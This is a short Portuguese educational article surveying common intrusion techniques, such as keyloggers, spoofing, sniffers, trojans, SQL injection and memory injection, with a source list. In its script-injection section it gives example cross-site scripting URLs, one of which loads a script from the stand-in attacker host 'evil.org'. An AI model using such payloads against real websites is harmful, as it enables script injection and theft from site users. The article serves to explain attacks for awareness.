Técnicas de invasão são formas de acesso a um site, servidor, computador ou serviço por alguém não autorizado, com fim de obter informações sigilosas ou controle. A invasão em si pode ser nociva com fins de agressão moral/monetária ou então construtiva, para análise de vulnerabilidades, sendo que, o objetivo pode ser tornar o usuário mais seguro explorando as vulnerabilidades.
Técnicas de invasão são formas de acesso a um site, servidor, computador ou serviço por alguém não autorizado, com fim de obter informações sigilosas ou controle.
Existem diversas ferramentas ou técnicas que auxiliam na invasão ou análise de vulnerabilidades.
Keyloggers: são aplicativos ou dispositivos que ficam em execução em um determinado computador para monitorar todas as entradas do teclado. Assim, aquele que deixou o programa em execução pode, em outro momento, conferir tudo o que foi digitado durante um determinado período.
Spoofing: Nesta técnica, o invasor convence alguém de que ele é algo ou alguém que não é, sem ter permissão para isso, conseguindo autenticação para acessar o que não deveria ter acesso, falsificando seu endereço de origem. É uma técnica de ataque contra a autenticidade, onde um usuário externo se faz passar por um usuário ou computador interno.
Envio de e-mails fakes: consiste em o usuário receber um link, por exemplo uma propaganda ou a “foto” de alguém e acessar achando que é real mas não é.
Sniffer: é um programa de computador que monitora passivamente o tráfego de rede, ele pode ser utilizado legitimamente, pelo administrador do sistema para verificar problemas de rede ou pode ser usado ilegitimamente por um intruso, para roubar nomes de usuários e senhas. Este tipo de programa explora o fato dos pacotes das aplicações TCP/IP não serem criptografados.
Vírus: programa de computador, utilizado maliciosamente ou não, que se reproduz embutindo-se em outros programas. Quando estes programas são executados, o vírus é ativado e pode se espalhar ainda mais, geralmente danificando sistemas e arquivos do computador onde ele se encontra. Um exemplo deste tipo de programa é o Worm.
Trojans: A denominação “Cavalo de Tróia” (Trojan Horse) foi atribuída aos programas que permitem a invasão de um computador alheio com espantosa facilidade. Nesse caso, o termo é análogo ao famoso artefato militar fabricado pelos gregos espartanos. Um “amigo” virtual presenteia o outro com um “presente de grego”, que seria um aplicativo qualquer. Quando o leigo o executa, o programa atua de forma diferente do que era esperado.
SQL Injection: É um ataque contra o banco de dados de uma empresa via web site. Nesse ataque, os crackers executam comandos não autorizados de SQL ao aproveitar sistemas inseguros que estão conectados na internet. O SQL Injection é a segunda mais comum vulnerabilidade em aplicações web, de acordo com o Open Web Application Security Project.
Code Injection e Script Injection: Code injection nada mais é do que injetar código em um processo e fazer com que este processo execute determinado código. O Script Injection é um tipo de Code Injection, porém é um ataque específico da web. Seguem Exemplos abaixo:
- http://trusted.org/search.cgi?criteria=<script>code</script>
- http://trusted.org/search.cgi?val=<SCRIPT SRC=’http://evil.org/badkama.js’> </SCRIPT>
- http://trusted.org/COM2.IMG%20src= “Javascript:alert(document.domain)”
Memory Injection: Nada mais é que injetar dados diretamente na memória, sem conhecimento do usuário ou do sistema operacional. Um exemplo: Vicenzo Iozzo, um pesquisador da área de segurança encontrou um método de injetar malware diretamente na memória de computadores rodando o sistema operacional Mac OS X. Esta técnica torna difícil a detecção forense pois não deixa rastros no disco pois toda a operação é feita na memória.
Autor: Diego Maldaner
Fontes:
http://computerworld.uol.com.br/slide-shows/como-funcionam-os-ataques-de-sql-injection/
http://www.technicalinfo.net/papers/CSS.html
http://luizjordao.wordpress.com/2010/08/03/script-injection/
http://www.esecurity.com.br/cursos/brasil/blackhat
http://seguranca-informacao-ranieri.blogspot.com.br/2009/07/tecnicas-de-invasao.html